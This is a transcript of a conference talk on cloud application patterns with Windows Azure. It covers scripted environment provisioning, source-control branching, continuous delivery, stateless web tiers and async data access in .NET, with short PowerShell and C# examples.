Thanks everyone for coming to NDC. This is my second time here and really excited to be back and want to thank everyone for coming out this week to the conference. It looks like some great speakers and great content throughout the week. My name is Scott Guthrie. I work at Microsoft on a couple different things, one of which is Windows Azure. What I'm going to do is spend this talk and the next talk kind of walking through a new talk that I've never done before, so I'm pretty excited to give it, which is basically called Building Real World Apps with Windows Azure. It's going to be kind of a patterns-based approach and I'll kind of walk through exactly what I mean just in the next couple slides. That walks through kind of how you build real world cloud-based solutions and the patterns are going to talk about apply to any cloud environment. You can use them with Amazon, you can use them with Google, although I'd really like it if you use them with us. The demos I'm going to walk through are going to be using.NET and Visual Studio and using Windows Azure to kind of show off how these concepts work and hopefully make them really real. How many people here have used Windows Azure? Okay, good. A lot of people have. A few people haven't. If you haven't, don't freak out. I'm going to provide enough context hopefully throughout the talk that, oh yeah, two bottles of water. Thank you. Even if you don't know what Windows Azure is, hopefully you know what it is at a high level, but if you don't know it from a practicality perspective, you'll still be able to kind of benefit and pick up a lot of things here. In terms of, so I'm going to spend 115 slides walking through patterns of cloud computing. I thought I'd just kick it off though first by walking through, first, what are some of the benefits that cloud computing gives you? Every time you want to learn new things, you might ask yourself, why am I learning it? I think ultimately cloud computing is exciting for a number of reasons. One of the reasons is as developers, it just lets us do more. It lets you reach your customers in a deeper way. You can build more engaging experiences. You can do things like mobile. You can use things like analytics to have a much richer customer experience. You can reach other markets with cloud computing because there's data centers around the world. You can very easily expand your business into new geographies. You can deliver things that just weren't possible today. We're going to build a simple solution today and walk through some of the concepts of it. It looks pretty small. It is a relatively small app. The nice thing about the way we're going to build it is if we wanted to build it so that we stored hundreds of terabytes of content with it, we could. If we wanted to build it so that we could run it across a thousand servers, we're going to architect it such that we could. It lets us approach problems that previously were just not practical and are now real. It's going to do it in a way that's cost effective. The app I'm going to build, you can basically develop and test it completely for free. Everything we're going to build, you could do it no cost whatsoever. The nice thing about cloud computing and Windows Azure is you pay only for what you use. 
As your app grows, as the amount of storage grows from a couple megabytes to a couple gigabytes to a couple terabytes, you're only paying for what you're actually using and you're not having to preallocate a lot of resources, which also, in addition to the technology from a business model perspective, again, enables you to kind of build apps that otherwise you might have a hard time getting your company to approve. Hopefully, you'll see at the end of the day, it's a really rich, flexible, and ultimately very agile environment that as developers ends up being fun. What I'm going to try to do today is walk through what I'm calling common cloud patterns that will help you be successful targeting this environment. Specifically, I'm going to walk through a simple app. I'm calling it Fixit, which is a very simple app, but it shows off a number of these patterns. It shows off data access. It shows off security, including enterprise, single sign-on with Active Directory. It shows off queuing. It shows off, we'll talk about caching, and we'll talk about telemetry and monitoring and logging and a whole bunch more. Specifically, here are the 13 concrete patterns we'll walk through, both this first talk and then the second talk. Using this code as sort of an example, and hopefully, you'll arm you with kind of the knowledge so that if you took the slides, took the code, you could go off and you could build pretty much any type of web or mobile-based application using these patterns and know that when you deploy it and run it, you'll be successful and hopefully have a really agile development environment that lets you kind of reach and build these types of new solutions. These are kind of the patterns we'll walk through. We're going a lot more depth on each of them throughout, and basically we're going to use kind of explain the concept and walk through code and hopefully make it real for each of these. A quick, simple demo of this app that we're going to walk through. Again, it's a pretty small app. It's called Fixit, and I'm not sure if Fixit translates well in Norwegian, but basically think of it as a ticketing system where you can go and you can say, I need something fixed and upload a ticket, and then someone can go ahead and process it and do something with it. So it's not a very complicated app, but the idea is you could go to it, you could log in using a forms authentication and a database, or what I've also wired up is supports that I can do enterprise single sign-on with Active Directory. So what I just did was redirect it to my company's portal, or sorry, company single sign-on. I'll walk through how you do that yourself, I can spell Microsoft correctly. And so basically I just logged in using my company security model. I can say, pick up room. My room is a mess. I'm going to sign it to myself. I'm David, but let's see. Trash, there we go. If I can upload a picture of what I want to get fixed, I can go ahead. I've uploaded it. I could create more tickets if I wanted to. Clean close. Please they smell. Signed it also to Scott. Again I'm logged in as David. And so forth. So that's the progress of the items that I've done. You can see I have a few, one that I've been working on last night. And then basically I'm just going to log off out of this application. And I'm going to log back in this time as me using the integrated off. So no single sign-on here. When I log in now I can see what issues are assigned to me. You can see David assigned to me. 
I need to clean the close and I can see a picture of my dirty close. And I could say they do. Market fixed to close it out. So again, very simple application. Not a huge in-depth app. But one that is rich, hopefully you can look at and say, yeah, I could build that. And what I'm going to do though is try to show you then how you could build this simple app but incorporate all these patterns as part of it. So that it's not just a simple app from a feature perspective. It might be a simple app from a feature perspective. But we're trying to build it in such a way that we could scale it out so that I could handle millions of users. We're trying to build it in a way that when I actually deploy it, it can be resilient to things like database failures or connection terminations. And I can automate it and have a very agile based workflow so that I could start simple and I can keep iterating on it in a very quick, fast way and make it better and better. And these patterns, again, they're true for any cloud environment. But if you follow them, they can really help you fall into what I call the pit of success when building your cloud apps. So the first pattern I'm going to walk through is, the first couple of patterns I'll walk through actually kind of apply to any project in general. But I think they're especially true in the cloud. And this is sort of the first pattern here is basically automate everything and make sure that as you're building your solution, you kind of try to eliminate as much manual process along the way. And you set yourself up so that you can have a very repeatable agile workflow as you're doing this type of environment. And kind of what, you know, you often hear this term dev ops. You know, this kind of workflow we want to be able to enable and that successful teams that really use the cloud in a deep way do a good job of enabling is this workflow where I can start with an idea. I can write some code. I can deploy it. I can run it in production and get a whole bunch of feedback on it. You know, people like it. Is it being successful? Are we seeing weird errors? And I can iterate very quickly, make changes, make fixes, add more features, get it back in production in a very quick way and just continue that process. You know, some teams deploy multiple times a day into a live production environment. One of the things that we've done on the Windows Azure side, on the team side over the last or 18 months, we went from a flow of we only shipped every couple months to the point where we were also in the mode where we actually update Windows Azure to the live service at least every two or three days with something. And we try to do major feature releases every two to three weeks. And getting into that cadence really enables you to kind of get immediate customer feedback and build out your business in a key way. The important thing though to be able to do that is that you have an environment that's repeatable, that it's reliable, it's predictable, and you can enable what I call low cycle time, which is from the point you have an idea to the point you get feedback and your customers are using it, you know, is as low as possible. And so the first two patterns or two or three patterns I'm going to walk through is just some of the best practices that we recommend for how you go ahead and do this. So the first thing we're going to talk about here is sort of automation. So a number of people mentioned they have used Azure. 
If you haven't used Azure, you know, one of the things that you've probably noticed when you first sign up for it, and certainly if you watch any of our demos or any of the overview talks that I've given in the past, is the Windows Azure portal, which is our management console that lets you see all of the resources that are deployed on Azure and provide a really easy way for you to go ahead and create and manage anything inside of the cloud environment. It's a great portal. It's, you know, we're very proud of it. I'm going to spend the rest of the talk telling you about why you shouldn't use it. But that's not entirely true. You do want to use it actually, especially in the beginning when you're just getting started. It's a great way to explore. So if I want to create a virtual machine inside Windows Azure, I can just say new compute virtual machine. I could say, what do you want to name this? NDC quiet. So I can basically just, hey, I'm going to add, there I can choose what I want to run this on. If I'm an MSDN customer, so if you're an MSDN subscriber, you actually get a whole bunch of Azure resources for free, up to $150 a month of resources. And so at a heavy discount. So you go ahead and take advantage of it. I can deploy this virtual machine anywhere in the world. We'll do West Europe. And I can also choose from a variety of images. So I could deploy SQL. I could deploy Windows. I could deploy Linux. Go ahead and create. And I'm done. And in basically four minutes, I'm going to have a virtual machine that I can go ahead and log into. This is one I have earlier. And I can basically log into it. And I have a nice virtual machine here that I'm an admin on that I could basically do anything I want within it. So you can see here. Again, if it's Linux environment, I could SSH in. And hopefully the network God's willing. We'll see a remote desktop shortly pop up. And I basically have full access on this machine. So there we go. So this is kind of as easy as it is to kind of create a new virtual machine. I now an admin on this box. I can install anything I want on it and I'm good to go. And so this portal makes it really easy to do that. Portal also makes it really easy so that if you wanted to, you could go ahead and say, create new website. And I could say, let's go ahead and create the Scott Goo NDC web. I can pick again where in the world I want to run it. Let's do a, no, it's not in the US. Let's do it. Sure. I can use this in the subscription. I can go ahead and create this. And what I'll see here is I'm creating a new website. Again, I can choose anywhere in the world that I want to go ahead and run it. And generally with Windows Azure, you can see where the website takes about six seconds to create. I've now got a nice little website that I can do. And if I wanted to, I could then go ahead, individual studio. We could call this Hello World. If I want to deploy this to that website, I could just go ahead and hit publish and use the UI here to basically say, let's deploy into that newly created website we just did. It's got Goo NDC web, hit OK. And I could basically just walk through hitting next, next, next. And in about six seconds or 20 seconds, I'll basically have a website that is deployed and running in the cloud that I just created. So this hopefully is an example of how easy it is to kind of use manual techniques and use the portal and use Visual Studio in order to very quickly get going. And so again, it's great for learning. 
It's great to kind of get started and definitely encourage you in the early days as you're kind of exploring Azure and just trying out the features. This is sort of a fantastic way to get started. The problem though is if every person on your team is using this kind of manual process in order to create and get going every time you want to deploy a new project or run it, you're going to start to make mistakes. And so again, this is great for getting started. It's great for spiking out an idea. But if you're going to really work on a production cloud application of any size, and especially if you're doing a team environment, my recommendation is do this once, learn it, and then automate it. And that's true for everything that we're going to do throughout this talk. And the great thing about Azure, and it's true mostly about pretty much every cloud environment, is everything that you can do through the portal, everything that you can do by right clicking inside Visual Studio, you can also do by automating in a completely scripted way. And you could write that script using PowerShell, you could use that script using things like Chef and Puppet, which are open source frameworks. You could also do things, you're just using the Bash command line tool inside a Mac or a Linux environment. We have scripting APIs exposed to all those different environments. And definitely worth checking out as you do things. So let's go ahead and create a new project and just sort of illustrate how that would work. What would you like to call this project? Silence. Silent 2. Okay. Silent 2. So we're going to create another app. It's a simple, low world app here. And what I'm going to do is inside this Silent 2 app, is I'm going to go ahead here and create simple project, or simple folder, I'm going to call Automation. So it's underneath right next to my solution. And I'm going to paste in a couple of simple little PowerShell scripts. And I'm going to post these later so you can go ahead and download them and use them yourself. And we'll walk through exactly what this thing is doing in just a second. So we'll go ahead and actually first let's kick it off. And what these PowerShell scripts are going to do here, so you can see Silent 2, and I have a little PowerShell window here, is one of them is called Create Azure Website Environment. And we'll call this the Silent 2, so NDC Silent 2 environment. I can choose where I want to deploy it in the world. So I do East to West to West to West. And I'm going to specify a SQL database password to use as start. And basically this is going to kick off in an automated way, provisioning for me in overall environment. Let's look at what the code is here while it's doing it. It's going to take about 70 seconds. And what I'm going to do here is just add a solution folder called Automation to my project. I'm going to add to this some existing items, which are those scripts, so that they can be part of my environment and they can actually be checked into my source control system, which we'll talk about in just a second. And what this script does, Simple PowerShell script, basically takes a bunch of parameters or just some defaults, and what it basically does is you can see I turn on verbose. We'll see if it's running here. And it's saying something about the network not being available. I pretended that work. And you can basically see here sort of a set of automation scripts where it's creating a path. It's going to automate for me, creating this website. 
And so it's using a command called New Azure Website, where I basically pass in the location and the thing there. This is how I can go ahead and create a SQL server. And you'll notice here one of the things I'm doing is actually retrieving my IP address and setting a firewall rule so that my dev machine can actually connect to it. And then what I do is I create what's called a storage account, which I'm going to be able to use for blobs and queues, which we'll walk through a little bit later. And I'm also then configuring as part of my app settings a number of pre-built settings on the solution here. So these are going to override my web.config files. And you'll notice here I'm passing in my SQL database and my storage details. I'm also enabling what's called the CLR profiler and setting up a new relic package so that we can actually do monitoring and diagnostics and telemetry. And then I embed my connection strings as part of this environment as well. And then when it's done, I just restart the web server we just created, output a bunch of stuff, and then basically just tell how long it took to actually run it. And you can see here, let's see if it's actually complete or whether or not it retried. But you can basically see what we did here is it went ahead and created for me all of this kind of environment. And if I go into the portal now, what I will see is a bunch of stuff that was created. So you can see I have my NDC Silent 2 website, which is what we just programmed. It's now running. I didn't have to click anything in the portal. I have a SQL database and somewhere inside here is the database I just created. And I also then have my storage account somewhere inside here as well that we just automated. And the beauty about this is I can effectively automate everything. It took about 90 seconds to create this environment. And every time now anyone on my team wants to create a test environment, they can basically just run the script and know that the exact same environment that I'm using on my dev machine they now have access to as well in their own environment. If I want to on my test servers or my production environment, I say, oh, we got a bad fix. We got to get this thing out quickly. I can go ahead and run this script. And in 90 seconds stand up a completely cloned environment of what my production system looks like that I can deploy bits into and go ahead and run. And the same way that I can go ahead and create this environment, I can also run a little script called deploy. And what this does is, and most of it is verbose because I'm just trying to output what's happening. But basically it's going to do a build on my solution on the command line and then effectively it just kicks off a deployment and deploys it into that web server environment that we just created. So you can see basically in only about 40 lines of PowerShell, most of it comments and logging statements, I can automate both the creation of my site and the deployment of it. And every time I deploy now, I can just go ahead and just say deploy from the command line. And I know that all the steps will happen always the same way in the same order in a completely automated way. And then I can now deploy as much as I want into the cloud environment and not have to worry about missing something or screwing something up or doing something custom on my machine that won't actually work in someone else's or in my production environment. So I'll post these scripts, you can run them yourself. 
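Condensed, the environment-creation script being read through here looks roughly like the sketch below. It is not the exact script (that gets posted separately); the resource names, parameters, and the hard-coded IP are placeholders, and the cmdlets shown are the ones from the Azure PowerShell module of that era, so check them against whatever module version you have installed.

```powershell
# Condensed sketch of the create-environment script described above.
# Names, parameter values, and the IP address are placeholders.
param(
    [string]$Name = "ndcsample",
    [string]$Location = "West Europe",
    [string]$SqlAdminPassword
)

# Create the website
New-AzureWebsite -Name $Name -Location $Location

# Create a storage account for blobs and queues
New-AzureStorageAccount -StorageAccountName $Name -Location $Location

# Create a SQL Database server and open the firewall for the dev machine
# (the real script looks up your current IP instead of hard-coding one)
$server = New-AzureSqlDatabaseServer -AdministratorLogin "dbadmin" `
              -AdministratorLoginPassword $SqlAdminPassword -Location $Location
New-AzureSqlDatabaseServerFirewallRule -ServerName $server.ServerName `
              -RuleName "dev" -StartIpAddress "1.2.3.4" -EndIpAddress "1.2.3.4"

# Push app settings / connection details into the site configuration
Set-AzureWebsite -Name $Name -AppSettings @{ "StorageAccountName" = $Name }

# Restart the site so the new settings take effect
Restart-AzureWebsite -Name $Name
```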
But again, everything I'm going to show throughout the talk here and everything inside Windows Azure, we basically have an API, both as a REST API, a PowerShell script and a command line bash utility that you can run on Linux or Mac in order to automate everything. And so definitely we're checking out once you actually get beyond kind of the early basics of Azure and figure out how you kind of apply in your environment. So pattern two I'm going to talk about is source control. I was talking to someone about the talk and I said, you know, we're going to basically walk through patterns you should use when you use source control. And he said, well, what happens if you don't use source control? And I said, well, okay, the first pattern, sub-pattern is use it. And then here's a couple other things to talk about specifically in terms of how you use it. You know, definitely do recommend using source control for pretty much anything. But especially in the cloud where you're changing things a lot and where you want to be able to react very quickly to issues that are being reported by your customers, source control is really essential. And it's essential not just for your code, but the other thing you really want to make sure you do in any type of services world is take those check-ins, you know, all those automation scripts that I just showed you and version them as part of your actual application solution along with your database scripts and pretty much everything necessary in order to run or scale your environment. So having checked in together with the code, that way when you actually iterate the code, you're changing the automation scripts at the same time. And if you ever need to roll back or you need to make a quick fix, you can sync the code and know that this set of code matches these set of scripts and that everyone on my team is using them. And we can use them in a very agile, repeatable way. And without having to spend lots of time trying to chase down which scripts or did Joe change this setting? He mentioned this, but he's not available. He's on vacation. You got to really make sure that you have everything in one place and it's totally repeatable. A couple other things just to make clear. Don't check in your secrets. Don't check in your passwords. Don't check in specific locations in your scripts. It's much better to actually, not just much better, you should always parameterize your scripts and store your secrets somewhere else. And also as you're kind of designing your source tree, think hard about what kind of branches you want to have and make sure that you optimize it for what I call a DevOps workflow. So what do I mean by that? There's lots of different ways that you can do branching on your projects or set up your source tree. This is kind of a pattern that we see a lot of kind of medium sized teams use where they basically have effectively a master branch. And this basically always maps to the code that's live in production. And so that way if you're ever having an issue with the live app that's running in the cloud, you can always very quickly switch to that branch, look at the code, look at the automation scripts and know that this is always the central source of truth to whatever is deployed and running that your customers is hitting. What we often then see is people actually set up branches underneath that to map to the different life cycles that they're developing. 
And often what they'll do is they'll have a development branch, which is where the development team checks into and integrates features. If it's a big team, you might have feature branches underneath. If it's a smaller team or you want to make sure that you're iterating and integrating often, you might just sort of stop at the development branch and have everyone check into that. But it scales if you have a couple people that are working on something that's going to take a week, you can just create a sub branch of development and then push it up through it. And then what we often recommend and often see people do is have a staging branch somewhere in between master and development that you use as kind of effectively your final integration testing or final testing before you go live in production. And so you can use different branch strategies, but one of these, you know, the nice thing about this type of approach, and for a small team, you could just have master and development. You don't need to have all these different branches. But the nice thing about this is it gives you a very agile way that you can flow your code from your dev machine into production in a kind of, again, a repeatable way. The other nice thing about having multiple branches is, again, it makes it much easier and having your master or you could have a sub branch called production if you want to snap it, always available, is that it enables you to kind of very quickly, again, react and make changes in an agile way. So if there's a live issue hitting production right now and you need to make a quick fix, you can just go ahead and create a sub branch off of staging or I guess even off of master. Make your hot fix, check it in, and then get it deployed. And you don't have to worry about having a bunch of features that in theory are all done but you're not a thousand percent sure that you're going to try to snap that hot fix into. This again allows you to kind of move off of the live production code, make a very small surgical fix, get it live as quickly as possible, and not have to spend a lot of time integrating and testing things that haven't hit production yet if it's an emergency. This type of model where you have multiple branches, you're working in different branches and you want to sometimes create new branches on the fly. You can use it with any source environment. Sometimes distributed based source control systems work best because you can quickly kind of move between these and they also kind of work great in kind of a distributed team environment. How many people here are using some kind of DVCS solution, either get or mercurial? Great. You can do all the same techniques I'm showing as well with TFS. We actually have teams within the Azure group, some that use centralized TFS, some of which use Git. We use both of them ourselves. Both work perfectly well in this type of environment. One thing that I've actually been playing with, and you'll see kind of be integrated even more going forward inside Visual Studio and with our team foundation service and server, is Git support. One of the things we announced earlier this year is we're kind of adding first class Git support in Visual Studio. For people that haven't tried that before, we'll just go back to our Silent 2 project here. If you want to use Git, you can now go ahead and just say add solution to source control. You can go ahead and say I want to check it in using either TFS source control, which is centralized or Git. 
What this will do is basically it's using the same Git command line tool in lib.lyb.git2. Oh my God, that's wrong, that you'd use elsewhere. What this has now done is basically added my project to source control using Git. I can go ahead and do a commit. I could say, if I wanted to, I could say initial check in, do a quick commit. Basically I just went ahead and checked in code. If I make a change, if I change this to say something else, I could do that. I can highlight what's changed. One of the things that's kind of nice is there's full diffing support with the VS tools. You can forget here. I can actually see the changes that I'm making and easily check them in. The nice thing about this also is if I want to ever make a branch, I could basically do that in an easy way. Let's say I realize, oh my gosh, we've got a bad problem that we need to fix. I could go ahead and create a new branch that I want to work with. I could very easily make a change to it. Create a new branch, we'll call this hotfix1. I now have a hotfix. I can go ahead and say this text should be different. Quickly go ahead and check this in. One of the things that's nice is as I switch between the branches, you'll notice here my code and my solution explorer will automatically change as well. It's a simple example of how quickly I can create a branch, work on something, flip back and forth between my development and my master, make a change, go ahead, use the automation scripts that are all checked in as part of my source control in order to push a live update or create an environment in order to do that testing in a very kind of agile way. This isn't the only way you can do it. You can use material, you can use TFS, you can write your scripts in whatever approach you want, but having these types of tools available are going to make you very repeatable, very agile, be able to respond quickly and have a lot of flexibility. If you ultimately want to check this in to kind of a team environment, the Git tools that we shipped inside VS do allow you to point to a Git repo, you can go to GitHub. One of the things that we're doing is actually now support as part of the team foundation service that we run and will ultimately ship as part of TFS server as well is adding Git repo support to that so that you can still use all the same TFS capabilities in terms of project and work item and bug tracking, but integrate Git as part of that as well. Some things to think about in terms of source control, but again the key things here are check in your scripts as part of your solution, parameterize everything, don't check in your secrets and then think hard about your branching strategy and really measure yourself on how quickly can you go ahead and make a change, get it live in a very safe, predictable way. Anytime that you think, gosh, I'm scared to make this change or we need to spend a day or two just doing kind of manual testing on it, pause and ask yourselves what do we need to do process wise, what do we need to do test wise in order to make it so that we could make that change in minutes or at least within an hour and do it in a very fast way that you feel comfortable with. Last sort of process thing I'll talk about before we dive into more code is another pattern here continuous integration and continuous delivery that people have probably heard the buzzword around. How many people are using a CI solution? How many people know that they should be using a CI solution? Okay. How many people are doing continuous delivery? 
That's a little bit more kind of new. Cool. The number of people you're doing here. How many people have no idea what I'm talking about? Okay. You're being, you're not being brave enough. I'm sure someone here is wondering what in the heck is continuous integration delivery? Well, at a high level the nice thing about continuous integration delivery done right is it enables a deployment pipeline so that you can integrate with your source trees, you can integrate with your automation environment and enable it so that every time someone does a check in, you can in a repeatable automated way go ahead and do a build, run your test against it and with continuous delivery you can go one step further and actually take those automation scripts and actually deploy it either by having someone push a button or even a completely manual or completely automated way as soon as the build tests pass into an environment that you can actually do more in depth testing with. And hopefully what you've seen with the automation that I've shown is automating everything inside Azure is really easy. Because it's running in the cloud, you're not having to build servers in order to actually or buy servers in order to actually do that. And the beauty about integrating the cloud with a continuous integration or delivery environment is you can now basically instead of having to wait for a server to be available to do your testing on, you can actually on every build that you do go ahead and actually spin up a test environment inside Azure, run acceptance tests or more in depth tests against it, then when you're done just tear it down. And if you only ran that server for say two hours or ten hours or a day, the amount of money that you actually would need to spend in order to pay for that because you're only paying for what you're using, you're only paying for the hours that that machine is actually running. And I can't do the conversion in my head. But in general, like a website, the website environment that I'm running right now basically costs one US cent per hour effectively. Actually, the one I just deployed will be free. But if I go to tear up, it's 1.6 cents per hour, which I don't know what it translates into in origin currency, but it's not much. And basically, it's less than, if you ran this for a month and you ran the environment effectively for only an hour at a time, it would probably cost less than a latte that you bought at Starbucks in order to actually have that environment used for your kind of environment. So it ends up being very cost effective, fully automated. And again, if you haven't used continuous integration and delivery before, it's definitely worth checking out. And generally what I recommend going back from the branching strategies is have at least your development and your staging environments be automated from a deployment perspective. So every time you check in, if your build tests pass, deploy it into some environment. Then you can run your full acceptance test, or you can have people on the team go ahead and check. If you want to be really bold, you could say every time we actually integrate into the master branch, also automatically deploy the live production site. That's kind of the nirvana that everyone knows that they should aspire towards. I'll be candid, most teams don't do that even within Microsoft. 
Just because sometimes it's nice to have some human being just sort of say, yep, we really want to push it live in the middle of the afternoon versus, well, let's actually wait until early morning or some point where all the dev team is available for us to go live. So often people will have a last minute manual check or at least push the OK button before it goes live in production. But there's nothing that can prevent you from actually having your entire dev environment and your entire test environment be completely automated so that all the developer needs to do is effectively just push their source into the main tree or in one of the branches in the main tree. And you can basically build it, run your unit tests, deploy it, run your acceptance tests, completely automated, and have as many developers on the team going ahead and doing that 24.7, very, very cost effectively. There's lots of solutions you can do to enable this. There's a bunch of great talks throughout the conference about integration and delivery. I can't do justice here, but hopefully I just wet your appetite. One thing that we're also working on ourselves, so there's things like TeamCity and other, Hudson and other environments that you can use in order to do CI and CD. One of the things though that we're also working on is part of our team foundation service, which is free up to five people, and you can sign up and actually play with it today, is actually trying to make it really great to do this type of continuous integration and continuous delivery without you having to set up anything. So it runs as a service, it actually runs on Azure, it supports both Git and TFS, and it now has an elastic build service so that you don't actually have to have build servers lying around. Instead, every time you push your code in, it can automatically kick off a build using servers that we maintain, and we don't charge you as long as you do a certain number of builds, then you can have reserved build servers if you want to pay a little extra. And we basically do continuous integration, we can deploy to Azure. They also just recently added load testing support, so once it's actually in an environment, you could start throwing load at it in order to measure performance and stability, and they just recently added some team room collaboration and some more agile project management capability. So if you're looking for kind of a turnkey solution, that's one you can also go ahead and look at. So now we talked a little bit of process, let's now drill in more into code, and I'm going to walk through a couple of best practices here, both on the website as well as with enterprise integration and then data throughout the rest of this talk. So let's start with web. How many of you here are doing web development or building apps? Great. A lot of these best practices apply both for web as well as for custom mobile back ends if you're using, say, ASP.NET web API, you can apply these as well. And at a high level, some of these ones that I kind of listed here from a best practice perspective that I kind of recommend, the first two kind of just are pretty obvious and then we'll drill into some of the more detailed ones a little bit later. But one is, you know, wherever possible, be stateless on your web tier. In other words, try not to use session state, try not to have anything that needs to be stored in the web server in a stateful way. Try to have it be as stateless as possible. There's a couple of reasons for that. 
One is if it's stateless and you put those machines behind a load balancer, it makes it really easy for you to go ahead and just keep adding machines as you need capacity. And it also makes it really easy for you to shrink machines or turn off machines as you don't need capacity. In an environment where you're only paying for what you use, that ability not only to expand but also to shrink your capacity based on load translates into huge savings. It also makes it architecturally much simpler to scale out your solution. So if possible, avoid session state since that does add some state. If you do need to use session state, don't store it in a database. We have a nice cache provider that you can use on Azure that we recommend instead. And that actually scales out and is much more cost effective and much better. Recommend using a CDN. For people who don't know what a CDN is, it's a content delivery network. This basically allows you to edge cache your JavaScript as well as your images so that if your customers are accessing your website, they don't always have to hit your web server. Instead, they can hit a cache location somewhere closer to them. In particular, if you are reaching a broad audience, that can help and just speeds up the overall load time of the site. And then this last one is something that, I'm curious to see how many people here are using the .NET 4.5 async support. People know that there's async support. Cool. It's really cool. Definitely recommend using it, both for your on-premises applications, so if you're running existing Windows servers inside your organization, but especially also in the cloud. And it allows you to kind of avoid making any blocking calls within your solution and really enables you to scale out in a much richer way. So for people that haven't seen it or have only heard about it, this is sort of a simple example, and we'll walk through this Fix It code in just a second, of where I'm using async and some of the benefits that it provides. So basically you can see now with the latest version of ASP.NET MVC, Web API and Web Forms, we have full async support. You can effectively just go ahead and mark a method as async. Then you typically return a Task of T. And then I can go ahead and every time I make a call to an async API, I can effectively say await on it (there's a minimal sketch of this pattern below). And what this does under the covers is the compiler will then automatically generate the appropriate async code so that as I'm waiting for this FixItRepository FindTaskByIdAsync method to go hit the database, ASP.NET can unwind the worker thread and use that thread to process another request. And the benefit there is instead of, you know, let's say the server has 10 worker threads, instead of having a lot of them blocked waiting on database calls or remote network calls, it can process a lot more requests much more efficiently. And you could do this in the past even with earlier versions of ASP.NET because they did have async APIs, but it was frankly kind of a nightmare to write that code and very error prone because you had to write a lot of async code in order to handle all the error conditions. What we've done in .NET 4.5 has made it really easy. So just directly within C# or VB, you can use these keywords in order to express the same intent and really scale out your app in a great way. A lot of people, you know, often talk about Node.js as an async based way in order to build server apps. We support Node.js also in Azure.
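For reference, here is a minimal sketch of the async action pattern being described. The type and member names (FixItTask, IFixItTaskRepository, FindTaskByIdAsync) follow what the talk mentions but are assumptions rather than the actual Fix It sample source:

```csharp
using System.Threading.Tasks;
using System.Web.Mvc;

// Entity and repository interface assumed for the sketch.
public class FixItTask
{
    public int FixItTaskId { get; set; }
    public string Title { get; set; }
    public string Owner { get; set; }
    public bool IsDone { get; set; }
}

public interface IFixItTaskRepository
{
    Task<FixItTask> FindTaskByIdAsync(int id);
}

public class FixItTaskController : Controller
{
    private readonly IFixItTaskRepository repository;

    public FixItTaskController(IFixItTaskRepository repository)
    {
        this.repository = repository;
    }

    // async + Task<ActionResult>: while the database call is in flight,
    // ASP.NET can reuse the worker thread for another request.
    public async Task<ActionResult> Details(int id)
    {
        FixItTask task = await repository.FindTaskByIdAsync(id);
        if (task == null)
        {
            return HttpNotFound();
        }
        return View(task);
    }
}
```

The compiler turns the await into a continuation, so no thread sits blocked while SQL does its work.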
The nice thing about the async support that we now have inside .NET is we do all the same things. We provide all that same capability. But I think from an API perspective, especially if you're coming from more of a procedural background, it's a little bit cleaner. You get full IntelliSense and full debugging. And then the benefit is the actual code that's running is also running through the standard CLR Just-in-Time Compiler. So you're running very, very optimized code on the server so that when your code is running, it's actually going to be much faster than, say, an interpreted environment. One thing that's cool that I'm taking advantage of in this app is we shipped as part of Web Forms, MVC and Web API async support for the web server, but our data libraries didn't support it yet. You could call web services, you could call sockets or do file system IO async. But the most common pattern for most people building web apps is to hit a database of some shape or form. We're adding async support into Entity Framework 6. And this is now available in preview. And the final release will be out in a few months. And what this means now is in my FixIt repository class that I've defined here, you'll notice that I'm able to access an Entity Framework context. This is just a standard code first database context. I can then have my repository classes also be async. And then I can go ahead and call my database and insert and retrieve things in a completely async way. And this now means both my data access library and my web tier can unwind the worker threads and run code in a super efficient way. Anytime I hit my database, I'm not blocking; I can return the thread and scale much better. And what's cool is this works not just for simple finders or inserts and deletes. It actually composes with LINQ queries as well. And so this is an example inside the code we'll walk through in just a second where I'm actually writing a complex LINQ query using where clauses and order-bys (there's a sketch of that repository below). And what you'll notice here is this whole method is async so that this whole complex query is going to be passed to the SQL database. The thread gets reused for another request. When the SQL database returns, we can pick the work back up on a thread, continue execution from the exact same place logically in the code that it left off and continue running. And now you can basically never block on the server and have an app that will scale better than pretty much any framework out there on the server in a really clean way, using the C# or VB or other .NET language that you already know. So I'm using this heavily within the application and we'll walk that code in just a second. Other things here in terms of what I'm using inside this web app just to kind of explain some basics. I'm taking advantage of a feature of Azure we call Websites. This is basically a way that you can go ahead and host a web app inside Azure without having to host and run your own virtual machine in order to do it. And so we actually provide all of the mechanisms necessary to basically run that website inside Azure and we'll do the hosting and the scale out and the recovery for you automatically. It works with ASP.NET, it works with Node.js, PHP and Python and it enables you to kind of very quickly deploy in seconds. And so you can make changes and quickly refresh them usually in a matter of less than 10 seconds from the point you hit deploy to the point that it's live in production.
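Here is a sketch of what such an async repository can look like with the Entity Framework 6 preview the talk refers to. FirstOrDefaultAsync, ToListAsync and DbContext come from EF6's System.Data.Entity namespace; the entity and interface are the ones assumed in the previous snippet, and the Owner/IsDone query is an invented example rather than the real Fix It query:

```csharp
using System.Collections.Generic;
using System.Data.Entity;   // EF6: DbContext plus the async LINQ extension methods
using System.Linq;
using System.Threading.Tasks;

public class FixItContext : DbContext
{
    // Standard code-first context exposing the tasks table.
    public DbSet<FixItTask> FixItTasks { get; set; }
}

public class FixItTaskRepository : IFixItTaskRepository
{
    private readonly FixItContext db = new FixItContext();

    public Task<FixItTask> FindTaskByIdAsync(int id)
    {
        // Simple finder: the await happens in the caller, no thread blocks on SQL.
        return db.FixItTasks.FirstOrDefaultAsync(t => t.FixItTaskId == id);
    }

    public async Task<List<FixItTask>> FindOpenTasksByOwnerAsync(string owner)
    {
        // A composed LINQ query with where clauses and order-bys; the whole
        // expression is translated to SQL and awaited asynchronously.
        return await db.FixItTasks
            .Where(t => t.Owner == owner && !t.IsDone)
            .OrderByDescending(t => t.FixItTaskId)
            .ToListAsync();
    }
}
```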
